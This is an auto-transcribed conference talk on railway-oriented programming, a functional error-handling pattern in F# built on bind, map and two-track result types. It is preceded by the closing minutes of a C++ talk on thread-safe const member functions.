do not need. If the logic of your program is such that we know that there will never be for a particular kind of object two threads using it simultaneously. For example, if I have a phased design and in the first phase of the design, only one thread uses the object and in the second phase, only some other thread uses the object, but they never access the object simultaneously. If you know that, if by design of your program, you guarantee that they will never be simultaneously accessed under those conditions, that's an exception to the rule. So if you are writing purely single threaded applications, you don't consider think at all about threading, you can forget about this guideline, program in C++98. But if you are programming a context where it is possible for your classes to be used in a multi-threaded environment where there could be simultaneous readers, then you need to follow the guideline that I'm giving you, which is to make constant member functions thread safe. Any questions about that? So the question is how do you ensure that if you are using a third party library that they have basically done this. If you find a third party library that's not doing this correctly, you need to file a bug report with the library. I mean, it's just, it's a concurrency bug in the library. So you may have to pay the cost of the library. So you may have to pay the cost of discovering that as a bug. I mean, essentially in moving, in going from a world with only one thread to a world with multiple threads, it is not going to be surprising if third party libraries are going to have some concurrency errors in them. Yeah. In your previous example, the mutex, you could use the mutex inside the else clause. So the question is, can't I move the mutex inside the else clause? And the answer is no. Because otherwise, then I'd be reading cache valid outside the mutex. Okay. So essentially the question is, all right, I want to move the lock guard inside the else and then I'm going to make cache valid atomic so that my threads, trust me, you're still going to get in trouble. In particular on relaxed memory architectures. This leads us right down the road into memory barriers and stuff like that. And that is a hell I do not want to go to. So I'm afraid I'm going to have to cut you off if you're asking more questions about that. I have a laser. I'm not afraid to use it. Okay. So here's the summary of what I want to talk about. We talked about three guidelines, but I slipped an extra one in there. So prefer auto to explicit type declarations. It's not just about programming style. It's also about efficiency and correctness. Remember that auto plus a brace initializer will deduce an initializer list. Distinguish parentheses and braces when creating objects. I'd love to be able to say always use one or always use the other. It's not that simple. I'm sorry. Make const member functions thread safe. If you're looking for more information about this, there's a true work of literary genius in the works, I hope. I'm working on a book called Effective Modern C++. I hope it's going to be out in October. If you want other guidelines based on information that will probably be in the book, I gave a presentation last year called an effective C++ 1114 sampler. It covers different guidelines than what I talked about here. Herb setter has written a thing called elements of modern C++ style. So you can get some guidance from.
Scott Meyers’ Effective C++ books are renowned for their clear, insightful descriptions of how to get the most out of C++, but they were written for C++98—for “old” C++. “New” C++ is defined by the C++11 and nascent C++14 standards, and Scott Meyers’ forthcoming Effective Modern C++ is devoted to the effective use of features in C++11 and C++14. For this presentation, Scott will select a few guidelines from Effective Modern C++ and walk you through them. The guidelines will focus on specific practices in C++98 that require revision for the most effective use of the modern versions of C++.
10.5446/50639 (DOI)
All right, can everyone hear me okay? Can everyone hear me all right? Yep. Okay, very good. All right, so welcome to railway-oriented programming. So in this talk, I'm going to explain the functional approach to error handling. And if you already understand the either monad with bind, then you don't need to be here. So, does anyone understand what I mean when I say either and bind? No. Okay, so hopefully this will be useful to you. Hopefully, actually, by the end of this talk, you actually understand what I'm talking about. Maybe not under that terminology, but under railway-oriented terminology. So, okay, so what do railways have to do with programming? Not a lot, except it's quite a nice metaphor for what I'm going to be talking about today, which is I'm trying to introduce these concepts using pictures and concepts that hopefully will be so obvious that you think, well, why did anyone ever think these things were complicated in the first place? So, my name's Scott Voloshin. I managed to get the Twitter handle, Scott Voloshin. That was very good. It was quite a lot of demand. I had to spend a lot of money to get that. I have a website called fsharpforfunandprofit.com, which is an fsharp website. And I have a consulting business called fpbridge.co.uk. The examples in this talk will be in fsharp because that's the language I use. But in fact, they will work equally well for Haskell, OCaml, Rust, and Swift, if you're into Swift. So this is a visa, just very general concepts. Right, so what I'm going to talk about is I'm going to talk about Happy Path programming first, which is what we normally spend our time thinking about, what happens when everything goes right. And we basically don't spend enough time thinking about what happens when things go wrong. And that's really what this talk's about. So when we deal with things that go wrong, in an imperative language like C sharp or Java, we have certain ways we deal with that. I'm going to show you the functional equivalent, which I'm calling well-weight-oriented programming. I'll show you how to do it in practice, and then various techniques you can do to actually extend it to be quite powerful. So let's start off with a simple use case. So here's my little scenario. As a user, I want to update my name and address, an email address. Okay, so I receive, I'm going to assume this is a very, very crude website web service. I'm not going to get hung up on the implementation too much. It's really just a concept. So let's say there's a request, it's got a user ID or a customer ID, and there's a name, and there's an email address, and so on. I need to validate that. Maybe I need to make sure the user ID is not negative, make sure the name is not blank. Maybe canonicalize it, maybe strip out spaces, you know, lowercase the email address, something I don't know. Then we update the existing user record in the database. And then maybe if the email has changed, we might send out a verification email saying your email has changed from this to this, you know, is it okay, you know, just to make sure that someone else hasn't taken over your account. And then finally, return the results users. That's really extremely simple use case. Can't really get much simpler than that. So how would you write it in some like C sharp? Well, we have a request and then we validate the request and we can on close the email and then we update the database and we send an email and then we return success. So that's the codes pretty much matches the use case. By the way, I'm going to show quite a bit of code. I don't want you to actually spend too much time reading the code. I just want to really just go over the roughly what the code looks like, you know, so it doesn't really matter the details of the code. But just to show you sometimes there'll be more code, sometimes really less code just to give you an idea, just quickly scan it. You don't have to like understand every line. So that's how it looks in a in C sharp. Hopefully that would be very familiar. I'm not saying this is the greatest code in the world. You know, you might want to put an async version of the send email or something, but it's good enough for this example. So let's look at the functional equivalent. So this is how you might write the same thing in F sharp. You have an update customer function. This is a method you receive a request. You validate request. You do the almost identical line for line pretty much the same thing. Those little double arrows, that's F sharp way of composing functions. So basically the output of one function goes into the input of the next function. But other than that, it looks, you could understand this is pretty much like the C sharp code. Right. So that's if everything goes right, but what happens if things go wrong? Okay. So happy path. And we never really think about it enough. This is a great quote. I like a program is a spell cast over computer turning input into error messages. So how often if we're lucky things will come out right, but a lot of the time we're not careful come out wrong. So here's you pull it. I don't know if you can see these, but I'll read some of these out to you. This is invalid, unhandled exception. The device is not ready. Okay. You've seen this kind of things. Zillions of times. This one says unhandled exceptions occurred in valid. User name. This one is a VB visual basic error overflow very helpful says one time error six. This one an unhandled an exception was unhandled the developer needs to do his job. This one says you've been warned three times this file does not exist. Now you've made us catch this worth this exception and we're upset. Do not do this again. This one classic keyboard not plugged in plus press F one to read. Press F one to retry. Good job. You broke photosynth. It wasn't your fault, but photosynth will crash and burn perhaps even taking this instance of IE with it. An error has occurred while creating an error report. That's a good one. An error has occurred, but this error message cannot be retrieved due to another error. And this is my favorite one error. The operation completed successfully. So this is the kind of thing this is you'll end up on, you know, one of those websites like the day daily W chef with something stupid. Don't do that handle your errors properly. So that's I think one of the difference between you might say professional programmer and a weekend amateur is how well do you handle your errors really. Okay, that's sort of differentiates the grown up some of the kiddies. So let me go back to this. This is a use case as a user. I want to update my name and email address and see sensible error messages when something goes wrong. We never put this in our use case. We sort of assume this we take it for granted, but I'm going to explicitly put it in here because we need to think about it. So let's think of all things can go wrong in this, even in this like three steps. Okay, what can go wrong? Well, the first thing is when we try and validate it, we can get a blank name. We can get an email, which is not valid. Also, so things can go wrong when we update the user record. Maybe the user isn't found in the database. Maybe we got a database connection error when we try and send an email. We get an authorization error. We got a time up lots and lots of things and go on. I haven't even started. I mean, this is just scratching the surface as you can think this hundreds of things and go wrong. So let's see how our C sharp code changes as a result of all this handling. So here's the original code, but then we need to validate the request. So if the first is not valid, we return, you know, quest is not valid. And then if the database fails, then we had to say customer record not found. But then we need to the database might throw an exception. So we have to wrap the whole thing in a try catch block. And then if we send the email, maybe we can't log in properly. So all of a sudden our nice clean C sharp code that modeled the use case very nicely in the happy path. Now it looks really ugly. All right. And basically we went from six clean lines to 18 ugly lines. And that's 200% extra code. That's two thirds the code is error handling and only one third of the code is actually doing something useful. And I'm sure you've all seen code like this. I'm sure your code is full of this kind of stuff. And it's really annoying because it sort of gets in the way of trying to understand what the code's trying to do. It's like the original code without her and it's lovely. I could totally understand what that was doing. Now I'm totally lost about what this code is trying to do. So let's look at the functional equivalent of this code. And the question is, can we preserve the elegance of the original code in the functional thing? Let's see how complicated the functional code gets. So here's the original functional code. All right. Very similar to the C code. And here is the code after error handling. So does that code look familiar? Yes. It's exactly the same code. Now you might think that's impossible. But you might have error handling codes that hasn't changed. And you might not believe me. Hopefully by the end of the talk you will believe me. And I can even demo. I actually have a little Visual Studio project I can actually demo it to you. So that's the point of this talk. So let's look at the difference between error handling in imperative design and a functional design. So in an imperative design, I have a request handling service like a website. The request comes in and response comes out. That's in the happy path. I pass it through, you know, a validation function and an update method. And send method and I get the response back. Now if something goes wrong, in an imperative model, I can return early. So if the validation fails, I just return early. I just never pass it through to the next thing. And if the update database fails, I just return early and I never pass it to the next thing. So that's pretty much what the imperative code looked like. There was try something if it fails, return, try something else if it fails, return, if, if, if, fail, fail, fail. So how does the functional design differ? So in the functional model, you don't have an input. You don't kind of call a method and get a response. You have a function. A function has an input and an output. So it's like a little black box. And every function has exactly one input and exactly one output. That's sort of the definition of a function. All right. So in this case, we have a function. The whole use case is going to be represented by one single function with an input and output. So in the happy case, the single function is going to be consistent of smaller functions which are connected together in a pipeline. So the output of the validate goes to the input of the update and the output of the update goes to the input of the send and so on and so forth. And the final output is your response. That's fine when everything goes well, what happens when things go badly. So the problem when things go badly is you can't do an early return. That concept does not exist in functional programming. What you have to do is you have to keep going all the way to the end. You cannot pass go. You cannot collect your $200. You always have to go to the end. So that's what a functional model looks like. So there are a couple of questions. How can you bypass these downstream functions? I want to return early, but I can't. How do I do that? And the second question is how can a function have more than one output? I just said a function can only have one output. And here it looks like I've got like four different outputs, one success output and three different error outputs. And that's not possible. Functions can only have one output. So how do I do that? Well, let me answer the second question first. So in a functional design, here's my three failure cases. What you can do is you can create something called a sum type, discriminated union. It's called an F-sharp or choice type, I like to call it. Because it's basically a choice of these four different things. But it's encapsulated into one single value. So it's not four different results. It's one single result with four different choices in it. So you can think of it like as an old style C union type with a tag that tells you which one except it's type safe, unlike C. Well, that's very, very specific to this particular use case. So, yeah, some types are great, by the way. One of the very best things about F-sharp or Haskell or OCaml or languages that have them. Worth switching languages just for that one feature if you're interested, if you're into it. This one is a bit specific to this particular use case, it's a bit more of a generic one I can use. Let's just have a more generic one. You have a success or a failure. You've got two choices, right? So I've merged all the failure cases into one single failure output. The problem with that is now I have no information about the failure. No information about the success either. So what I do is I modify that bit and I parameterize it by a type. So it's this T entity. So it's some sort of value that is on the success path, like the customer or the product or whatever it is you're trying to do. And in the success path, that's what you get. And on the failure path, you get a string. So you've got a choice of two different things, a successful thing, a successful entity or a failed string. And that's returned as a single value from your function. Does that make sense so far? You can think of this as a little bit like an inheritance with two subclasses. That's another way of thinking about it if you want to do it that way. Right, that's actually not the final design, but that's a good starting point for the rest of the talk. So each use case is a single function. The function returns a sum type with two choices, success and failure. The function is going to be built from a set of smaller functions. And each smaller function is going to represent one step in the data flow. And then you can connect all the smaller functions together. And all the errors are going to be combined into single failure. So that's our functional design for doing our handling. Well, hopefully that sort of makes sense. But the devil is in the details, so let's look at how we're going to do it. How do you actually bypass the downstream functions when you have an error? That's the key thing. How can we actually get that to work? So how do I work with errors in a functional way? Well, as it happens, I have this very clever friend, and he knows everything about functional programming. And next to him, I'm kind of, I feel like I'm kind of stupid. So I asked him, how do I handle errors in a functional way? So I have a series of functions that I want to chain together, and I need to capture errors at the same time. And he said, that's easy, you just need a monad, right? So you probably all heard of monads, but you probably don't know what they mean. And that's how I felt when I first encountered it. So I said, well, what's a monad? And he said, a monad is just a monoid in the category of endofunctors. And you might have heard that too, and that's kind of not very helpful. So I said, well, you know, and he said, what's the problem? And I said, I don't know what an endofunctor is, and he said, well, it's easy. A functor is just a homomorphism between categories, and so an endofunctor is just a functor that maps a category to itself. And that's the kind of thing when you talk to smart people, this is the kind of stuff they tell you. Okay? Simple, he said. And I said, yeah, right, of course, I understand, but seriously, seriously, what do I have to do? So he said, okay, well, you don't really need to know everything about monads, you just maybe need to use maybe. And I said, maybe what? And he said, maybe the monad. And I said, maybe the monad what? Maybe is the name of the monad. And I said, don't you mean maybe the name of the monad is? And he said, no, you're talking like Yoda. Maybe the name of the monad is. And I said, no, no, you're talking like Yoda, you are. So he said, yeah, okay, maybe is definitely what you want. So I said, definitely maybe. And he said, actually, I prefer what's the story morning, Glowey. So yeah, whatever that is. And he says, and he changes mind, he says, okay, actually either might be better. And I said, either what? And he said, either the monad, and I said, either the monad or what? And he said, either, that's all. And I said, just either. And he said, no, just is part of maybe. So if you're a Haskell person, you'll understand what I'm talking about. And I said, just maybe. And he said, no, you have to say just, just or just nothing. And I said, just nothing. But a minute ago, you said, definitely maybe. And he said, well, now I'm talking about either. And I said, either, just nothing or definitely maybe, which one isn't make up your mind. And he said, neither, just use either. And that's sort of when my head exploded. So I don't know if you've ever had a conversation with, you know, people who are experts, maybe academic people in functional programming. I think if you understand all this stuff, it's very easy to talk like that. And I want to try and present a way which is a little bit easier to understand than that. Really, monads are actually not that confusing. They have this thing about being confusing. If you actually read the original paper by Phil Wadler, it's actually not that bad. A little bit scary if you don't like math, but it's actually very, very readable. Just skip over the math bit and focus on the text and it should make perfect sense. So instead of monads, I'm going to talk about well-oriented programming. It's got nothing to do with monads. So let's go back to the definition of a function again. So I think I like the analogy of a function is like a bit of a railway track. And on this railway track, there is the tunnel of transformation. And that turns things from one thing into another. When they go through this tunnel, they get transformed into a different kind of thing. So in this case, maybe I have an apple going into this tunnel of transformation and it comes out as a banana. So this function takes apples to bananas. It turns apples into bananas. So you write it in F sharp and in Haskell as well. You write it as apple little arrow banana. So it takes an apple as input and it outputs a banana as output. Does that make sense? Pretty straightforward. So what happens when you have two of these functions? So here is a function that turns an apple into banana. And here's another function that happens to turn a banana into a cherry. So how do I connect them together? So in functional programming, what's very nice is you can compose them together. And you basically glue them together. And it's pretty obvious how you glue them together. You just stick them together like that. You take the output of one and you stick it at the input of the other. That's called composition. And when you do that, you get a new function. And this function turns apples into cherries. The banana is kind of hidden inside. In fact, what's really great about this is you cannot tell that this new function was built from smaller functions. And that's one of the great powers of functional programming is you get this composition model where the tiny things are functions, but you glue them together and you get this giant big function. And it's the same thing. You literally cannot tell how it was built. And it's the same logic. It's the same model all the way from the bottom to the top. All right. So that's with the single input and a single output. So in this situation, we have an error. So here we have a, let's say we have a validation function, and it gets an input. It gets a request as an input, but it has a success branch and a failure branch. So how could we model that using this railway analogy? Any ideas? Branch line. Branch line, yes. So I'm going to show you, just show you a little bit of code here. So if the name is blank, then throw a failure case. If the email is blank for a failure case, otherwise it's a success. So that's an example of real F sharp code that generates a failure and a success. All right. Yes. The way we model it is one of these things. Okay. Now I'm going to call them switches, which is the U.S. terminology. UK, British English calls them points. I don't know what they say in Norway, but I use American terminology just because, I think switch is actually a better word from a functional programming point of view for what these things do. So we have a switch, and it has an input, and it has two outputs. Now, like I said, it's not really two outputs. It's one structure with two cases, but I'm going to call them two outputs, basically. So you've got a success case in green and a failure case in red. So how do you glue these together? So let's say we have the validate function, and it's got this kind of split, and we have an update database function, and it's got a split. And I want to glue them together in a line. So what we have to do is if the validate function is successful, we want that input, the output of that one, to go to the input of the update. But if the validate is a failure, we want to bypass it and go all the way to the end. So I think it's pretty obvious that the way you connect them is like that. Okay. I think hopefully it's very, really obvious this is the right way to connect these two things together. What happens when we have three different functions? So here we have our validate and our update and our send email. And I want to glue them all together. And when I do that, I end up with this. So this is what I call a two-track model. All right? So instead of having one track, you have two tracks. You have a success track and a failure track. And the data comes in, and when something goes wrong, it gets shunted onto the failure track, and the failure tracker keeps going to the end of the function. So hopefully that's pretty straightforward. I think it's kind of quite easy to understand. So how do you actually do this in practice? So let's just step it back a bit. So we have our two-track system and we have these two-track tunnels. So these steps in our process are now these tunnels. They cross both tracks now. It's not just a single tunnel of transformation. The tunnel is now quite wide, and it covers both tracks. But if you look inside the tunnels, you can see that inside each one is actually a little switch. So gluing them together. So I talked about it's quite easy to glue together. If you've got one coming in and one coming out, you can glue them together. It's really easy. It's also easy to glue them together. If you have two things going in and two things coming out, because you just connect the two things together, just like some sort of plug and socket. But we don't have two things coming in. We have one thing going in and two things coming out. So how do we connect them? They just won't connect properly. So what we want to do is take our one-track input, two-track output thing, our switch, and we want to turn it into something which has two-track input and two-track output. If you can turn it into those things, then we can glue them together really nicely. So how do we convert from the first case to the second case? Well, what we do is we have a little adapter block. So this is a little thing, and it has two-track input and a two-track output, but it's got a little slot in the top that we feed our switch into, and it magically sorts it for us. So we pass in one of these switches, and we get out one of these two-track things. So it's literally the adapter pattern, if you want to think about it from OO. I'm converting something that doesn't fit into something that does fit. So let's see how that works. We have this two-track input. So we're actually going to define the function. I'm going to define the function for you. So literally a four-line function like this. So we pass in a switch function, and we output a new function, and it has a two-track input, and the two-track input, on the success case, we call the switch function. All right? And if it's the failure case, we just go straight out as a failure. So failure in, failure out. We call the switch function. The switch function could be a success or failure, depending on how it actually works. So that's exactly how you write this adaption function. Now, this adapter function is actually called bind in functional languages. I don't know. Wow. That's the first reasons why it might be called bind, but if you see a function called bind in a functional language, this is exactly what it's doing. And I'll just show you the type signature. In functional languages, type signatures are really important, and they actually tell you everything you need to know about the function normally, so you don't really need to know what the name is. If it has that type signature, you know what kind of function it is. So this particular function has three parts. The first part is something that takes an apple to a banana, right? But it takes it from a one-track apple to a two-track banana. Right? So that's our switch function. That's the functional way of doing generics. So in a C-sharp, you might call it a T entity one, and an AU, and a V, or something like that. So in functional programming, you use ABC for generics. So it's an apple-banana cherry. So it takes an apple to a banana, and as a result of that, the output is a new function, and the new function takes a two-track apple and turns it into a two-track banana. So that's the bind function. This is one of the very most important functions in functional programming. You can actually write the same function with two parameters. This one has one parameter, a switch function. This one has two parameters, a two-track function. It's exactly the same function. One of the weird things you can do in functional programming is have a one-parameter function and a two-parameter function that's the same function. And that's called carrying, and I have an interesting post about that if you want to, but you don't really need to understand that for this talk. All right, so let's look at some real examples. We have our name-not-blank validation function. If the name is blank, it returns a failure. If the name is not blank, it returns success. Let's say it has to be less than 50 characters long, so if it's longer than 50, you return a failure. Otherwise, it's a success. If the email is blank, it's a failure. Otherwise, it's a success. So there's our three little switches, and we want to glue them together. So what we do is, first of all, for each one, we put a bind in front of it, and that converts each one of those little functions into these two-track functions. And then once we have the two-track functions, we can glue them together with composition. Does that all make sense to you? All right. And what's cool about this is we now have a new function called validate request, say, that has those three different validation steps in it, but it looks like one big two-track function. It's like now one big tunnel, rather than three small tunnels, it's one big tunnel. So I now have a new function that's a two-track function input, and it takes a two-track input and a two-track output. Again, I cannot tell that it was composed of smaller functions, which is kind of cool. And as you can see, it's pretty obvious that now I just build up my bigger functions, my big two-track functions, and my small two-track functions, just the same way that I built my one-track functions by gluing them together. I can build my two-track functions by gluing them together, but I have to use the bind to do that. Sometimes you'll see this symbol for bind, and it's double-arrow followed by an equal sign, and so the code might look a bit like that. I'm not going to use that, actually. I'm going to try and stick with the word bind, just so you know what I'm talking about. But this is one of those things where you see some strange symbols in functional programming, and you think, oh, it's full of all sorts of weird symbols. There aren't actually that many weird symbols. There's maybe five or six things that kind of crop up over and over, and this is one of them. You see this is just another word for bind, it's an infix version of bind. Right. Just to point out that this bind thing has got nothing to do with how the things get transformed. It's about the shape. So if we take an apple input in the outputs of banana and a banana input in the outputs of cherry, the whole thing takes an apple and outputs a cherry. Now, if I try and pass in the wrong kind of thing, I can't connect up, you know, if I'm trying to, if something takes a pineapple instead of a banana or something, they won't, I still can't connect them because the types won't match. So it's still type safe, but it's all about the shape, not the types themselves. So here's my generic two track thing, same as the example I showed originally. So in this case, the t entity is an apple. In the second case, the t entity is a banana. In the third case, the t entity is a cherry. So it's a generic type, just like a list of t entity or, you know, an i repository or i, you know, not disposable. You know, the various functions that take generics in.NET. All right, so let's review what we've got. We started off with these switches and we turned them into two track functions using bind, and then we glued them together with composition and we now have a new function. All right, time for a joke, because that's kind of boring. This is a kind of boring, I mean, I'm not saying this is an exciting talk, I think it's interesting, but I wouldn't say it's exciting, so here's a bit of joke for you. What do you call a train that eats toffee? I don't know, what do you call the train that eats toffee? You call it a choo choo train. Right, okay, that's for all the seven-year-olds in the audience. Some of you might be eight-year-olds, so you might not find that funny anyway. All right, so let's see what we can do with this. We can take this out of a spin and work with other kinds of functions, because that's not the only kind of function we have to deal with. That was, you know, a very, very simple model. So let's, real life is always more complicated than that. Let's see if we can fit real life into this. So the first kind of thing we should deal with is single track functions. So we talked about these switch functions, like validation, where there could be an input, a success and a failure. What happens if it's always going to be a success? If you can guarantee it's going to be a success. How does that fit into this model? What happens if you have a dead-end function, like you put something in a database and nothing comes out? It's just, you know, just vanishes, gets sucked into nothing. How do you handle that? What about functions that throw exceptions, right, because if you're dealing with.NET code, it may well do that. And what about, you know, what I'm calling supervise functions, like logging, monitoring, event handling, that kind of stuff. So we'll start with single track functions. So here's an example of a single track function, canonicalized email. Okay, so we're going to trim the email and we're going to lowercase it. All right, now that function can't go wrong. Assuming the input's not blank, because we know it's not blank, because we validated it before. So I'm going to assume the input's not blank. And hopefully it won't throw an exception. If it throws an exception like out of memory or something, then there's nothing we can do about that. But it's not going to throw an IO exception or anything. So that's a one-track function. But that doesn't fit into our model, right? We can't glue a one-track function in between these two-track functions. So what do we do? Well, we have to turn it into a two-track function, right? That's kind of obvious. So if we turn it into a two-track function, we have one of these adapter blocks. So in the previous case, the adapter block had a switch in it. This adapter block just has a single slot for a one-track function. So the failure track is never used. So how do we turn a one-track function into a two-track function? There it is. It goes in like that and it comes out like that. So the function that does that in functional programming is called map. Well, sometimes it's called lift. So it turns a one-track function into a two-track function. And it's very simple. Again, if you have a successful input, you run that function on the success, and then you put that on the success branch. And if you have a failure as input, you just return the failure. And it has this type signature. Slightly different. The first one with bind, it took an apple and it returned a two-track banana. In this one, it's an apple and it takes something, some type like an apple, and returns a different type like a banana. And it turns it into a two-track apple going to a two-track banana. But there's no error handling. The first parameter doesn't have any errors. So it's just straightforward mapping from one thing to another thing. All right? So I say, don't worry about this code. I'm not expecting you to understand this code. It's just showing you that it's actually just literally a few lines of code. Hopefully, I'll put the slides up. You can go with them at your later one. And you can actually write map in terms of bind. So it's kind of one of the cool things about functional programs. You can build even functions like map. You can build it from smaller functions. So that's how you build it from bind. Right. So now we've turned our one-track into a two-track and we can glue it together. That's great. What about dead-end functions? So a dead-end function is something like updating a database. You have some sort of customer. You update the database. Nothing comes back. It's like a void. All right? Now, in functional programming, you actually can't have void. Every function has to return something. In functional programming, that's called a unit. So it returns a unit, but it's still pretty useless. It's not a lot you can do with it. So again, it doesn't fit into our model, two-track model. We need another adapter function. So what we're going to do is we're going to turn our dead-end function into a single-track function. All right? So have a one-track input and a one-track output. And I'm going to just call it t, for lack of a better word. There's not really a consistent name for these kinds of things. But again, you can see that you can slot in my dead-end function, but it still, what it does, it takes the same input and just passes it on as the output. Now, once I have my one-track function, I can then use map to turn my one-track function into a two-track function, just like I showed you before. So my dead-end function can be slotted into this model as well. All right? Let's look at functions that, for exceptions. So I'm specifically thinking of anything to do with IO. That's where you get file exceptions, web exceptions, database exceptions. You call something and it says, oh, yeah, I return a file. It's like, no, you don't. Sometimes you return a file, but sometimes you throw an exception. So what we do here is we have what looks like a one-track input. Let's say you're sending an email to SMT server. It looks like it's a one-track function, but it's not really because it could for exceptions. So what you want to do is catch all the possible exceptions it could throw, right? And you basically wrap it in a try-catch, right? And now what you've done is you've turned something that throws exceptions into something which is a switch function. So any possible error that could happen in that function is now put on the failure path. So once you've turned it that way, you don't have to worry about exceptions in your code anymore. You just wrap your IO stuff with these exception handling things. So now send email looks like that. Once it looks like that, you can glue it together with all the other ones. And like I say, I wouldn't worry about things like out-of-memory exceptions. I would worry about far-not-found exception, argument null exception, or all the weird exception, the web timeouts. So it's a very important guideline in functional programming. You don't really use exceptions in functional programming as an error-handling mechanism. A camel does a little bit, but it's generally considered bad form. You basically want to turn things into errors, especially this two-track error model, and then you can handle it nice. You can see exactly what's going on. It's not just me who says this. Yoda says this too. You probably didn't think that Yoda had an opinion about programming models, but in fact he does, because remember he said, do or do not, there's no try. So, yeah. Hold up there. All right. So yeah, don't use try. If you're using try-catching code, you're doing something wrong. Now you can use try-catch at the very low level when you're dealing with IO, but once you've done that, you should not bubble up. You never have to handle exceptions higher up. And finally, we have super-right-as-you functions like I say, tracing, logging, like that. And here we go. The same model. Let's say we want to log everything that happens on the success, or maybe we want to log everything that happens on a failure. So we just want to insert that into our stream. Well, we just have an adapter block, and it takes two functions, one that you do on a success and one that you do on a failure. So that's really straightforward. So, putting it all together, we have our validate function, which takes an input. We have a canonicalize. We have an update database. We have our send email. Oh, something we've forgotten is how do we actually get the output of this thing? So we've got this two-track model, but your browser doesn't understand two-track types. Your browser deals with strings. So what we need to do is we need to handle, take both tracks and merge them together into something that your browser can handle. So here's an example of return. So let's say it's a success. You return an OK, and you turn the object to JSON or something, or XML, whatever. On the hand, if it's a failure, you might return a bad request, say, or invalid server operations and that. And exactly which one you can do, I'm actually going to show you. You can choose in more detail exactly which one to return. But if you look at this workflow, you can see that there's no early returns, and all the error handling is done at the very end. The final conversions is done at the very last step of the return side, things. Which makes these things really, really easy to test. So if I just want to test the validation logic, if I just want to test the send email logic, I can do that. Each one of these things is completely isolated. So it's a really useful framework, and I think it really pretty much covers most cases. I mean, there's some cases it doesn't handle, but I think for most things I would recommend using this model. So let's look at the code we had before and after error handling. Remember I said I want to see what we can do, what it would look like. So that was the code before. Receive a request, you take the output of that, you pipe it into validate request, you take the output of that, you pipe it into update and so on. And here's the code afterwards. Now I promised that they would look the same. And I think that you can see they really are, because if you look to that two-flow, that two-track model is exactly the same. Receive, validate, update, send, return. So the code looks the same, but what's being passed around are two-track things rather than one-track things. Make sense? Yeah? Still clean and elegant, that's what I like about it. Time for another joke. You're laughing already, I haven't even said the joke. Okay, why can't the Steam Locomotive sit down? I don't know, because it has a tender behind. Right, I'm going to talk about some more stuff. Any questions so far? Making sense? Hopefully, yeah? So this entire thing is predicated on the fact that you're not really concerned about what functions are doing. You have this set of functions that take those things and convert them into something else that you can then compose and handle errors while you go along. Yes, so the question is, the whole thing is predicated on the fact that you can have a generic way of composing functions that don't really care what's actually going on. It's about the shape of the functions being glued together, absolutely. This is a completely generic error-handling technique. So it's a uniquely functional way of looking at it? Yes, well actually all you need is choice types or discriminating unions. So if you actually have what they call the ethermonads in Haskell, you can do this. So you can do this in C sharp, it's painful, you can do it. It's a lot easier if the language, if you can do it in four lines of code, it's a lot easier than doing it in 100 lines of code. Yeah. That's, if I don't have a surrounding exception here, so the question is what happens if I have divide by zero? Well no, every single, the divide by zero would be a step called divide by zero. That's a one track function that throws an exception. We don't have to wrap that as a bind over time. Yeah, well no, I think, well yes, well it depends on what you think is a pain in the ass. I think, I would have a function called divide to numbers and it returns, it's a two track function, it returns a yes or no. And I can then reuse that function over and over. I don't have to write that function more than once. Yeah, but you've got to change all the code that's got divide to. Yes, but all your, well, okay. So the question is do you have to change all your codes that has the, let's say you've got these divisions everywhere in your code and you have to change it. The answer is yes, if you want to have safe error handling, everywhere that you do a divide that is not wrapped in an exception handler, you have to wrap it in an exception handler. Yes. Which you have to do either globe, well you don't have to, you could wrap it globally. I'm not saying this is good, I'm doing things like matrix multiplication or something, I wouldn't necessarily recommend this as the best method. But for sort of business cases, if you're wrapping, these are reusable functions, you know, so once I've got a wrap, a generic exception handler for divide by zero, I pass that through all the way, absolutely. So yeah, it doesn't help if you've got a legacy code that doesn't do that, it's painful. Now, Erlang of course, you just crash and carry on, but that's, this is not Erlang, so. Well, it's into the role of the currency, I mean, and then our next test, what happens if the entire machine with the computation is running for crashes? Yes, that's why, so this is good for systems where you don't want this, where it's bad if your system crashes. So the point is, you know, in Erlang, you just crash and carry on. In.NET, you don't really want to throw unharmed exceptions, it's not a good model. So yes, one answer is don't use.NET, but if you are using.NET, this is probably what you want to be using. Right, okay, so let's, let's extend the frame and see what we've got. So I'm going to talk about designing for errors. So if you're going to use this model, there's a way you should design for errors. You can, designing for errors actually becomes part of your requirements. I'll talk about how to do stuff in parallel, and I'll talk about domain events. So let's talk about error handling. So the first, the point I want to make here is that errors are actually requirements. Okay, the unhappy paths are requirements too. Don't ignore them just because you just crush your fingers and hopefully never happen. That's not very good to design. All right, so let's look at how you can turn this model into something where you actually design the errors in. All right, rather than just being an accidental afterthought. So let's say we're validating our input and we have our failures here. So, and here's our two track type. First problem is that using strings is a terrible idea. All right, strings are just awful. They don't really tell you information. They're very locales specific. I can't translate this into Norwegian very easily. It's just not a very good model. It's not a strings are not a good way for designing things. So what I really want to do is use an enum. Right, so I have a set of constants as you might say, and each possible error is represented by enum. And in F sharp, that's actually a choice type. So we're creating a special type for the failure case, not using string anymore. So in the two track model, the failure is no longer a string. It's now a error message type. All right, and that error message type is now a list of choices. So it could be a name not blank. It could be an email not blank. All right. One of the nice things about using the F sharp choices is that the choices can actually have data along with them. So they're not just it's not just an enum in the C sharp sense. It's a set of again more like inheritance where each possible subclass can have data with it. So in this case, if the email doesn't match the rejects for valid emails, you can actually say it's not valid. And here is the email that didn't work. All right, you can actually pass data along with it. And if I go down to my error message type, the email not valid choice has an email address that goes along with it. So later on when it comes time to generate the error messages, I know exactly what the email address that triggered the email was. So I can log it later on. I can give it back to the user and so on. So what you do is you start off his or error message type. And basically you keep adding things. Every time something goes wrong, you add a choice to this. All right. So maybe the user ID is not valid or maybe the database user is not found or maybe you've got a connection string time out concurrency error authorization of SMT. All these everything can go wrong. You start putting this big long list. So you think, oh, blimey, that's a lot of stuff. I have to put everything that could possibly go wrong in this list. And I say, yes, you do because it's documentation for everything that possibly go wrong. If you don't put it in this list, it means you've forgotten something. Right. So, you know, you don't have to have a special thing for email blank and, you know, you could have a generic database error or you could have a generic invalid server error. If you if you want to keep it generic, the more specific you are, the better your login can be and the more fine range your error handling can be. But that's up to you. But I personally think, you know, having 50 things that go wrong is actually really good because I've now know that I've thought about everything that can go wrong in this particular use case. I have documentation for it. And what's great about this documentation is it's type safe because this is a type. This is code. Right. This is not just a comment. This is code. So if I try and create a new kind of error that is not handled, you know, let's say I want to. Oh, I don't know. Yeah, the user, the custom ID is not negative. Right. There's a little value that's not on here. So that validation. So if it tries to create a customer ID is not negative error, that's a compiler error because it's not on this list. I have to put customer ID is not negative as a choice. And then I can then my code will 